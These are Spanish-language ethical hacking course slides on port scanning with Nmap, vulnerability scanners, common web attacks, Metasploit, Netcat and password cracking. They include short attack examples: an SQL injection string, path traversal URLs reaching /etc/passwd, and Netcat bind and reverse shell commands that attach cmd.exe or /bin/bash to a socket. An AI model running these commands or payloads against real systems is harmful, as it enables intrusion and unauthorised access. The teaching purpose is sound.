2.3. Enumeración de los Servicios

Contenido de Agenda

 Introducción
 Escaneo y Enumeración
 Nmap

11
División de Alta Tecnología
Ethical Hacking

3.1. Definición

Network mapper es un software libre escaneador de puertos por


excelencia. Originalmente, fue programado por Gordon Lyon (Fyodor)
en septiembre de 1997. Actualmente es utilizado para evaluar la
seguridad de los sistemas informáticos, así como, para descubrir
servicios y servidores en una red informática.

3.2. Tipos de Escaneo

12
División de Alta Tecnología
Ethical Hacking

3.3. Otros Comandos

a) -PN: no intenta enviar un ping al equipo escaneado.


b) -V: obtiene información adicional.
c) --Reason: muestra la razón porque el puerto fue tomado como abierto,
cerrado o filtrado.
d) -P: Nmap por defecto escanea .los 1000 puertos más conocidos
e) -sC: permite utilizar, programar y compartir los scripts utilizando el
lenguaje de programación LUA.
f) -sV: reconoce si un puerto está abierto, interrogue al puerto para
realizar una detección del servicio.
g) -O: analiza respuestas para determinar el SO.

3.3. Otros Comandos

a) paranoid (0)
Evasión IDS, serializado, 5 minutos de gap
b) sneaky (1)
15 segundos de gap
c) polite (2)
0.4 segundos de gap
d) normal (3)
verificaciones en paralelo
e) aggressive (4)
10 milisegundos de gap
f) insane (5)
5 milisegundos de gap

13
División de Alta Tecnología
Ethical Hacking

Laboratorio nº 5

 Ejercicio:
 Tiempo: 90 minutos
 Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compañeros, lo que le permitirá obtener valiosas conclusiones.

14
División de Alta Tecnología
Ethical Hacking

6.0 Análisis de las Vulnerabilidades

Contenido de Agenda

 Introducción
 Analizadores a Nivel Plataforma
 Analizadores a Nivel Aplicación

1
División de Alta Tecnología
Ethical Hacking

1.1. Análisis de Vulnerabilidades

a) El escaneo de puertos da como resultado, qué puertos se tienen para la


escucha y además, qué servicios están corriendo (incluye las versiones)
b) El AV permite identificar muchos de los principales agujeros de
seguridad que ponen en riesgo los sistemas de una red.
c) El AV es parte de la etapa de scanning y es el paso anterior antes de
iniciar el ataque propiamente dicho.

1.2. Análisis Automatizado

Este tipo de análisis se basa en el uso de herramientas que,


generalmente con una interfaz simple y amigable, permiten
identificar vulnerabilidades en los equipos presentes en una red.

2
División de Alta Tecnología
Ethical Hacking

1.3. Análisis Manual

Es el proceso por el cual, se ejecutan diversas pruebas sobre


un objetivo buscando descubrir, mediante procedimientos
manuales, la presencia de vulnerabilidades de seguridad.

1.4. Nivel Plataforma

El análisis de vulnerabilidades a nivel de plataforma consiste en


la búsqueda, evaluación y comprobación de vulnerabilidades a
nivel del sistema operativo que ejecuta el objetivo y los
servicios de red que se ofrecen.

3
División de Alta Tecnología
Ethical Hacking

1.5. Nivel Aplicación

El análisis a nivel aplicación consiste en la búsqueda de


vulnerabilidades directamente sobre las aplicaciones que
corren en una determinada plataforma.

Contenido de Agenda

 Introducción
 Analizadores a Nivel Plataforma
 Analizadores a Nivel Aplicación

4
División de Alta Tecnología
Ethical Hacking

2.1. Software Nessus

a) Potente escaner de vulnerabilidades,


desarrollado por la empresa Teenable
Security de libre descarga.
b) Con Nessus se pueden exportar
informes, donde se encuentran enlaces a
Internet que explican el tipo de
vulnerabilidad encontrada.
– ¿Cómo es explotada?
– ¿Cómo se soluciona?

2.2. Software NeXpose

a) NeXpose es una herramienta creada por


Rapid7 que se ofrece como una solución
en el proceso de identificación de
vulnerabilidades y generación de
reportes detallados.
b) La base de datos de vulnerabilidades
evaluadas por NeXpose incluye sistemas
operativos, bases de datos y
aplicaciones.

5
División de Alta Tecnología
Ethical Hacking

Contenido de Agenda

 Introducción
 Analizadores a Nivel Plataforma
 Analizadores a Nivel Aplicación

3.1. Software Nikto

a) Se utiliza para encontrar archivos Web por defecto, y


examinar la seguridad de un servidor Web, así como,
sus aplicaciones CGI.
b) El programa busca automáticamente los fallos y muestra
un listado categorizándolos de esta manera:
– Problemas de configuración.
– Archivos y scripts por defecto.
– Archivos y scripts inseguros.
– Software desactualizado.

6
División de Alta Tecnología
Ethical Hacking

3.2. Software Paros

a) Paros es una herramienta libre programada en Java


utilizada para la evaluación de vulnerabilidades de
aplicaciones Web
b) Consiste en un proxy que permite capturar las peticiones
tanto HTTP como HTTPS para simplemente registrarlas o
modificarlas.

3.3. Tamper Data

a) Tamper Data es una extensión para el navegador Mozilla


Firefox, que puede ser descargada desde
https://addons.mozilla.org/en-US/firefox/addon/966/
b) Permite interceptar el tráfico HTTP entre el browser y el sitio
web y así, descubrir brechas de seguridad en aplicaciones
Web.
c) Se pueden inspeccionar y modificar las cabeceras HTTP
como las variables enviadas.

7
División de Alta Tecnología
Ethical Hacking

Laboratorio nº 6

 Ejercicio:
 Tiempo: 60 minutos
 Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compañeros, lo que le permitirá obtener valiosas conclusiones.

8
División de Alta Tecnología
Ethical Hacking

7.0 Inseguridades en Aplicaciones Web

Contenido de Agenda

 Introducción
 Vulnerabilidades Web
 Frameworks de Aprendizaje

1
División de Alta Tecnología
Ethical Hacking

1.1. Definición y Conceptos

a) Cuando se habla de la seguridad en


aplicaciones Web normalmente, no se
habla de las vulnerabilidades de los
sistemas operativos o servidores Web.
b) A menudo, se habla de las
vulnerabilidades del propio software y/o
aplicaciones desarrolladas por la empresa
o por un tercero.
c) La seguridad en las aplicaciones Web se
encuentran ligadas, exclusivamente, con la
lógica, código fuente y contenido de una
aplicación.

1.1. Definición y Conceptos

d) Las vulnerabilidades que afectan a las aplicaciones Web


pueden ser explotadas en distintas plataformas, en contraste
de lo que ocurre con otros tipos de vulnerabilidades
dependientes de la plataforma donde estos se ejecutan o
corren.

2
División de Alta Tecnología
Ethical Hacking

Contenido de Agenda

 Introducción
 Vulnerabilidades Web
 Frameworks de Aprendizaje

2.1. Antecedentes

a) Para proteger exitosamente una aplicación Web es necesario conocer los


tipos de ataques existentes y la vulnerabilidad que éstos explotan para
entender sus posibles variaciones.
b) SecurityFocus, organización dedicada a la seguridad informática,
analizó 30,000 incidentes de seguridad en aplicaciones Web ocurridos
durante el 2007.
c) Se determinó que los ataques hacia aplicaciones Web más utilizados
aprovechan las vulnerabilidades de las seguridad publicadas y/o
conocidas.

3
División de Alta Tecnología
Ethical Hacking

2.1. Antecedentes

d) Hoy no se registran nuevos tipos de vulnerabilidades tan


sólo variaciones de las conocidas. Normalmente, los ataques
se realizan en la capa de aplicación por los puertos (80 y
443)
e) Esto es confirmado por organizaciones internacionales
comprometidas con la seguridad Web:
- OWASP www.owasp.org
- WebAppSec www.webappsec.org

2.1. Antecedentes

http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

4
División de Alta Tecnología
Ethical Hacking

2.2. Tipos de Ataque

Inyección SQL

Este ataque es utilizado por intrusos para


comprometer aplicaciones que construyen
sentencias SQL utilizando los datos
suministrados por el usuario y es posible,
debido a falta de validación y saneamiento
de los parámetros suministrados por el usuario.

2.2. Tipos de Ataque

Inyección SQL

SELECT * FROM Tusuario WHERE user='admin' AND passw='123456'

SELECT * FROM Tusuario WHERE user='admin' AND passw=' ' OR 1=1’

5
División de Alta Tecnología
Ethical Hacking

2.2. Tipos de Ataque

Cross Site Scripting (XSS)

XSS ocurre cuando portales web de contenido dinámico muestran variables


de entrada suplidas por el usuario sin una propia validación. Esta
vulnerabilidad permite a un atacante la inyección de código que será
ejecutado por el navegador Web de la persona que visualiza la página, (la
víctima)

http://www.xssed.org/

2.2. Tipos de Ataque

Manipulación del Path

La manipulación de path (Path Trasversal) afecta a aplicaciones


que toman entrada de los usuarios y la utilizan en un path
para acceder al sistema de archivos. Si el atacante ingresa
caracteres especiales que modifican el path la aplicación,
podrá permitir el acceso no autorizado a recursos del sistema.

6
División de Alta Tecnología
Ethical Hacking

2.2. Tipos de Ataque

Manipulación del Path


www.sitio.com/imprimir.php?file=archivo1.txt
www.sitio.com/imprimir.php?file=../../etc/passwd
www.sitio.com/imprimir.php?file=../../scripts/db.inc

2.2. Tipos de Ataque

Remote File Inclusion

Técnica que permite el enlace de archivos remotos situados en


otros servidores a causa de una mala programación. Los lenguajes
de programación de lado servidor, permiten la inclusión de código
desde una ubicación externa, tanto local como remota.

7
División de Alta Tecnología
Ethical Hacking

Contenido de Agenda

 Introducción
 Vulnerabilidades Web
 Frameworks de Aprendizaje

3.1. WebGoat

Aplicación Web, deliberadamente, creada para ser insegura basada en J2EE y


desarrollada por OWASP.

Actualmente existen más de 30 lecciones que incluyen vulnerabilidades como


XSS, Control de Accesos, SQL Injection, Cookies débiles y Manipulación de Parámetros.

8
División de Alta Tecnología
Ethical Hacking

3.2. Damn Vulnerable Wep Application

Es una aplicación (PHP/MySQL) de entrenamiento en seguridad Web que se destaca


por ser de liviano peso.

Permite entrenamiento en seguridad Web en SQL Injection, XSS (Cross Site Scripting), LFI
(Local File Inclusion), RFI (Remote File Inclusion), Command Execution, Upload Script y Login
Brute Force.

Laboratorio nº 7

 Ejercicio:
 Tiempo: 60 minutos
 Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compañeros, lo que le permitirá obtener valiosas conclusiones.

9
oidiiddhufhahfofhjfhajos
División de Alta Tecnología
Ethical Hacking

8.0 Explotación de las Vulnerabilidades

Contenido de Agenda

 Trabajando con Exploits


 Metasploit
 La Navaja Suiza del Hacker
 Password Cracking

1
División de Alta Tecnología
Ethical Hacking

1.1. Introducción

a) Luego de realizar el análisis de las vulnerabilidades se tiene


conocimiento exacto de los principales agujeros de seguridad TI de la
empresa.
b) A continuación, es necesario informarse sobre todas las vulnerabilidades
para comprenderlas, saber a qué sistemas afectan, bajo qué condiciones
éstas pueden ser explotadas y si existe un exploit público.
c) Revisar el código fuente para verificar que no es falso y confirmar las
plataformas en que operan. Durante el proceso de Ethical Hacking puede
modificarse aunque por temas de tiempos no es común.

1.2. Securityfocus.com

2
División de Alta Tecnología
Ethical Hacking

1.3. Exploit-db.com

1.4. Packetstormsecurity.org

3
División de Alta Tecnología
Ethical Hacking

1.5. Compilando Exploits

extensión: .pl
Extensión: .c, .cc perl exploit.pl parámetros
gcc exploit.c -o binario
./binario parámetros
Extensión: .php
php exploit.php parámetros

Extensión: .py
python exploit.py parámetros
Extensión: .rb
ruby exploit.rb parámetros

Contenido de Agenda

 Trabajando con Exploits


 Metasploit
 La Navaja Suiza del Hacker
 Password Cracking

4
División de Alta Tecnología
Ethical Hacking

2.1. Introducción

Es una herramienta integral de software libre para el


desarrollo y ejecución de exploits contra equipos remotos. Es
conocido y respetado por liberar algunos de los exploits
más sofisticados, a tan sólo unas horas de haber sido
liberada una vulnerabilidad públicamente.

2.2. Forma de Instalación

a) apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby


b) apt-get install subversion libreadline-ruby irb ri rubygems
c) tar xf framework-3.X.tar.gz
d) sudo mkdir -p /opt/metasploit3
e) sudo cp -a msf3/ /opt/metasploit3/msf3
f) sudo chown root:root -R /opt/metasploit3/msf3
g) sudo ln -sf /opt/metasploit3/msf3/msf* /usr/local/bin/
h) svn update /opt/metasploit3/msf3/

5
División de Alta Tecnología
Ethical Hacking

2.3. Formas de Utilización

Metasploit permite interactuar con su funcionalidad, a


través de dos interfaces: mediante la consola llamada
msfconsole y de una interfaz Web de nombre msfweb.

2.4. Metasploit Framework

Al margen de la interfaz, el procedimiento para explotar una


vulnerabilidad son los mismos:

a) Elegir el exploit a utilizar


b) Configurar el exploit
c) Elegir el Payload
d) Ejecutar el exploit

6
División de Alta Tecnología
Ethical Hacking

Contenido de Agenda

 Trabajando con Exploits


 Metasploit
 La Navaja Suiza del Hacker
 Password Cracking

3.1. Introducción

Netcat es una herramienta que permite, a través de la línea


de comandos, leer y escribir información en sockets a
través de la red de datos utilizando el protocolo de
comunicación TCP/IP.

7
División de Alta Tecnología
Ethical Hacking

3.2. Funcionalidades de la Herramienta

a) Conectarse y abrir un puertos TCP/UDP


b) Asociar un shell a un puerto (para realizar una administración
remota de un terminal)
c) Transferencias de archivos
d) Abrir puertas traseras (backdoors)
e) Crear canales encubiertos

3.3. Parámetros Básicos

8
División de Alta Tecnología
Ethical Hacking

3.4. Transfiriendo Archivos

Netcat puede ser utilizado para transferir archivos de una


computadora a otra, a través de la red. Esto se aplica para
archivos de texto y binarios.
a) Máquina A: nc -lvp 4444 > salida.txt
b) Máquina B: nc -vv 192.168.1.1 444 < test.txt

3.5. Shell Directo (Puerta Trasera)

Máquina A:
a) Windows: nc -lvvp 4444 -e cmd.exe
b) Linux: nc -lvvp 444 -e /bin/bash

Máquina B:
a) nc -v 192.168.1.1 4444

9
División de Alta Tecnología
Ethical Hacking

3.6. Shell Reversa (Firewall Bypass)

Máquina B:
a) nc -lvvp 4444

Máquina A:
a) Windows: nc -v 192.168.1.1
4444 -e cmd.exe
b) Linux: nc -v 192.168.1.1 4444 -
e /bin/bash

Contenido de Agenda

 Trabajando con Exploits


 Metasploit
 La Navaja Suiza del Hacker
 Password Cracking

10
División de Alta Tecnología
Ethical Hacking

4.1. Introducción

Password Cracking es el proceso informático por el cual, se


intenta conseguir credenciales válidas de una aplicación y
puede ser utilizado para recuperar credenciales perdidas,
evaluar la robustez de las credenciales o conseguir acceso
no autorizado.

4.2. Técnicas de Password Cracking

Password
Ataque
Guessing Password Sniffing
Híbrido

Ataque por Fuerza Bruta


Diccionario

11
División de Alta Tecnología
Ethical Hacking

4.3. Herramientas

THC Hydra Medusa

Cain &
Abel

Laboratorio nº 8

 Ejercicio:
 Tiempo: 60 minutos
 Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compañeros, lo que le permitirá obtener valiosas conclusiones.

12

También podría gustarte